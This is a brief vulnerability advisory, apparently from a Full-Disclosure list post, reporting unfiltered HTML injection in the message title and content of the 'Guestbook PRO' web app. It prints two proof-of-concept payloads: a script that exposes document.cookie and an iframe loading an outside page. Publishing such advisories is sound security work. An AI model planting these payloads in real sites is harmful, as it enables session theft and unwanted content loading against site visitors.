============================================================
============================================================
Guestbook PRO is an advanced guestbook for WebApp.
A new vulnerability is in the content and title of msg, when not controlling the
entrance of characters, being able to inject HTML code.
Type in the title or content of msg
<script>alert(document.cookie)</script>
<iframe src=http://othersite/sb.php>
Contact the Vendor.
http://www.soulblack.com.ar/repo/papers/guesbookpro_advisory.txt
Vulnerability reported by SoulBlack Security Research
============================================================
–
SoulBlack - Security Research
http://www.soulblack.com.ar
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/